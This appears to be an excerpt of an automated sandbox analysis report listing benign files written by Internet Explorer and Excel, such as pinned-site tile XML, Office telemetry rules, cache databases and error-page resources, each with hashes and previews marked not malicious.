                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):5.1164003676913445
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:D1895BCDE1E9E97A00400AA885C9E93A
                                                                                                                                      SHA1:09A4C26963584FEA0A515BC0979F9239C12BB714
                                                                                                                                      SHA-256:63CD35E0730EA60D18259C8B8D525D6F1509219546D85DD3C9B0B8B60DD8E1C2
                                                                                                                                      SHA-512:758BAA0026A34DDA017BC57C385E46CEBD1F7BD7A4825D6827F4A131951AAC0B26A40DAF41B1C13BA5CFA49D1DBD024F587E4F5F20E5AAA3B56C8FD12AA8CCCD
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x352a0cad,0x01d659c0</date><accdate>0x352a0cad,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x352a0cad,0x01d659c0</date><accdate>0x352cbb2f,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):661
                                                                                                                                      Entropy (8bit):5.138695579209784
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:EE82D6A3603ABA2ACAD2A9125A420E29
                                                                                                                                      SHA1:F086257CD15813744C85BC2698A996BDE79F3583
                                                                                                                                      SHA-256:BFB183EC7F2E73725D8AF88A99203195A9C5FD9A8C4E42572C48D9DBA66B5D25
                                                                                                                                      SHA-512:5DFBD804FC4A4562F588410B8D8C2C8967450A5C769CEE070B68E605DB045A5ABBD75D4CF177B5E677DAA82C16A01FDBEAF131D43DE7194AD59758C31E842CAF
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x3541255e,0x01d659c0</date><accdate>0x3541255e,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x3541255e,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-314712940\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):409
                                                                                                                                      Entropy (8bit):5.187125655806997
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:015240C46BA32FA0CA487C865E1431A2
                                                                                                                                      SHA1:2FE6821AF813AD597EE4828730B4DED3BDA37F8F
                                                                                                                                      SHA-256:087BC6880582883B642995991B1433D7EC3D2010361A9825E7AC33425D0A44D6
                                                                                                                                      SHA-512:242E3EE024CFA04C7713B6BB75256AD2CC3EFA61CE7AEFC969B88FE92D03DBECCD42A91CCC90EA7C59199AA8CBBAC6A48896D0A672884B15B70AD42D8A7E2D8B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0xbb41d6e3,0x01d5fd35</date><accdate>0x352f439b,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/><selection>\lowres.png</selection></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):646
                                                                                                                                      Entropy (8bit):5.115653536992936
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:A2E5D1E6085D51AEE4F0CC0A95BC6EE4
                                                                                                                                      SHA1:63417B7B244E171B85FC5F88DBC0EE26EE9EB102
                                                                                                                                      SHA-256:7847032C85585F3A0DF20C3C9D888C844692F19B2253652A192473A4A0639533
                                                                                                                                      SHA-512:AA2CC6491BC61D6A2081CF80B99D7229D21C854228F7C663634C04B2D098A6FF039F7186A77139167AA9400402AAEC000D3782A1A7957EAECFC9D9CCF9221AD6
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35371671,0x01d659c0</date><accdate>0x35371671,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35371671,0x01d659c0</date><accdate>0x35371671,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):655
                                                                                                                                      Entropy (8bit):5.14338115265285
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:E38D69CE45137FC5FE26581B083027FD
                                                                                                                                      SHA1:974B92D18AE0199ACE7B019535495663BDACA608
                                                                                                                                      SHA-256:D7B0AF5554A9DCBB6982F33939A58ECE184BB67F59252E709A349BC5B51BCF22
                                                                                                                                      SHA-512:270DEFA95ADA75CB17F7B524FBC4FA1446CC9DF763610377E8280514C1E04D3B716964F7647C9F2571B6C89D07C90C4FAB4D790FAD7E96599728AB6B9163BF96
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3542a2ec,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3542a2ec,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):5.079786636004328
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:11D97AC38949F625E1964DA51A3A31C0
                                                                                                                                      SHA1:A191A76753400755A6699F151F8F5FC308EA3034
                                                                                                                                      SHA-256:E817B5D4BD6395C38F855A9F30C9D36E08D013DB644A9418D8CAA37708C07C29
                                                                                                                                      SHA-512:3A664F83F4A6CDDF6E6CD65AF0F6C72EB78415CC959E9FBEC8B17217F22E200C0E37A0AEB247B5E68F97AE8479A454F500C181EE626DEB805002B590815C7603
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35399eea,0x01d659c0</date><accdate>0x35399eea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35399eea,0x01d659c0</date><accdate>0x35399eea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):655
                                                                                                                                      Entropy (8bit):5.137119220625062
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:222CC3B5FA44DB9D01378F4745BF47CD
                                                                                                                                      SHA1:F2AB0F990AF67F6AE3C71D8FFD459A9BDF216235
                                                                                                                                      SHA-256:32F6F14B0900F819C0162ECE7E9287B32C93D548164226FD2B68BAA34645ED78
                                                                                                                                      SHA-512:2D14D3473ACA42FAEFCD404835A42AD3DA88B796738B5B50CD9CD2B382C63178FD582FAE90E646FC615E9440145EA51BBFD7D7968F69A2943B15F1A29E46145D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x35371671,0x01d659c0</date><accdate>0x35371671,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x35371671,0x01d659c0</date><accdate>0x35399eea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):658
                                                                                                                                      Entropy (8bit):5.129058085584826
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:79B3DDD289E625C7010547821530BD87
                                                                                                                                      SHA1:F834898D25BFAE7F50BA2E40F768B3DE2A2C32C4
                                                                                                                                      SHA-256:A941E6505785794ABA37DDF275243075F50999F5B9C246871F897DE5BC55FDE3
                                                                                                                                      SHA-512:16232CC5BA7B1D59D21E4DA547997E7D097B7CAE8256FD40C1D64BC84BF61E5EAC43A14C14058FBF2906CDACCE997D8FCCD681021129B58167B366C2E89FC82D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3531f250,0x01d659c0</date><accdate>0x3531f250,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3531f250,0x01d659c0</date><accdate>0x35348e01,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):5.104828222498662
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:EE3E059BB77CFF55DB081B18727BD08F
                                                                                                                                      SHA1:66D03CBD7A40F8766CD766F728B3D92DBB11311D
                                                                                                                                      SHA-256:CF481CD6BAB34B7AF476B924FC8430B22F418CF9DFD1E5D9F3D62CAAD9E1DFFC
                                                                                                                                      SHA-512:A1E49AD4A5E73EE41CC48927C969A88EE7DE03E1BEA327A41F5069CB61FD08BF356D609BD917B83FEC92C69D1F4612DA540BC89A4057D8BB56115EA5DC3BFC3A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x35348e01,0x01d659c0</date><accdate>0x35348e01,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x35348e01,0x01d659c0</date><accdate>0x35348e01,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D5DED82E-F14D-4C75-B211-3C8926E9C5FD
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):127847
                                                                                                                                      Entropy (8bit):5.377163921068166
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:C685E09A8C912131ACE9DDF33E9255EF
                                                                                                                                      SHA1:F4C4A2C1BBDF7D27C14A41C0FB066A7F0567561B
                                                                                                                                      SHA-256:87EB66ACB63999A5E89A7E2AA89E616F6554C34AE07ABF2F0B62717E28018A68
                                                                                                                                      SHA-512:67402437C3AD56530589CFEB503ECA8122AA260C6711FDC2A1B34A95CCECA906274C70A9507E7BD786C92F434AEC3CCDB13AA3212408E61EAE8F1A4623D8F130
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-07-14T09:20:13">.. Build: 16.0.13113.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with no line terminators
                                                                                                                                      Size (bytes):412027
                                                                                                                                      Entropy (8bit):5.105190603444391
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5F2A0C5CE21462BA3620A02E887FE38F
                                                                                                                                      SHA1:F55BE2197E8A76192D29AE68D0E25BAD8BF144E1
                                                                                                                                      SHA-256:F1E6977EE28764F50918828603EBD1CE27A4151349DEB6099C269447D950DB57
                                                                                                                                      SHA-512:D7582E9DFE8461C428C922000C8A5B287CD4D4F484353A65242779B04BA9D2B4DFA0A528F4FC3AD60FFA0E57BD2835D5A6ECBDFD5C68E0CCAA7F9863DF1E5C0D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2" F="Warning" /></C><C
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                      Size (bytes):4152
                                                                                                                                      Entropy (8bit):1.1815294385240924
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:1E22250ACB0B4FB9C4A3575D2E1F3206
                                                                                                                                      SHA1:0FC624A6316C2BA82BDC42F0E97AE5034C939397
                                                                                                                                      SHA-256:5FBA0F19217C8F7ED18B0B7D0537748273498D4C6FE4C769EDDB582EB93697ED
                                                                                                                                      SHA-512:AD9659F226917D0D6F83E7A1A481E2CBCC88B74BEAF6AE5C8A3691C56A1BFF77DE20741D548CE9C81490A5F9033F456E6BC7DB04792412AF6F56ED7990643A28
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3019003
                                                                                                                                      Size (bytes):12288
                                                                                                                                      Entropy (8bit):0.9279194729410528
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:385FD397FD2A30DB81F51FDBD4F72A8D
                                                                                                                                      SHA1:B5E7B3E0068E5E9C5B566ADE807F89718B32BD8A
                                                                                                                                      SHA-256:F93484A630FFAE446B7566FB0F70C4EEE8E38D61FE4F81ECC75653C95B0EFACA
                                                                                                                                      SHA-512:5F86841C97AA3D4E190353E80B2C9114631DED1579BFB242CABBF55A8F1EE05421E8C0834A839E38F94F1B3CE920D4B7C7ED7921E1808CC38D1DF08EDD8DDD00
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session-journal
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):13360
                                                                                                                                      Entropy (8bit):0.9060517234041621
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:37A9F843D3EF794F1DEAF6AEA68A9B18
                                                                                                                                      SHA1:449EDF0A5EF4FEE0FF0E13C512D0C9AD95BE0D13
                                                                                                                                      SHA-256:5372A91D5338788C27DE27B570FA79FDD53E57927E6A531F3EB5014A08084FB5
                                                                                                                                      SHA-512:1FCFA38D645CE0360144A8F990E5254D1D7D08CC5412E91BD7377F75A0009A7A50BAD5DC393D2B5AB6DCA7ACF7C6CF3F1C3C47044842484837C5631EC1F58B70
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\ErrorPageTemplate[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):2168
                                                                                                                                      Entropy (8bit):5.207912016937144
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                      SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                      SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                      SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\bullet[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.304718288205936
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                      SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                      SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                      SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\down[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Size (bytes):748
                                                                                                                                      Entropy (8bit):7.249606135668305
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\errorPageStrings[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):4720
                                                                                                                                      Entropy (8bit):5.164796203267696
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                      Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\ErrorPageTemplate[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):2168
                                                                                                                                      Entropy (8bit):5.207912016937144
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                      SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                      SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                      SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                      Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\bullet[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.304718288205936
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                      SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                      SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
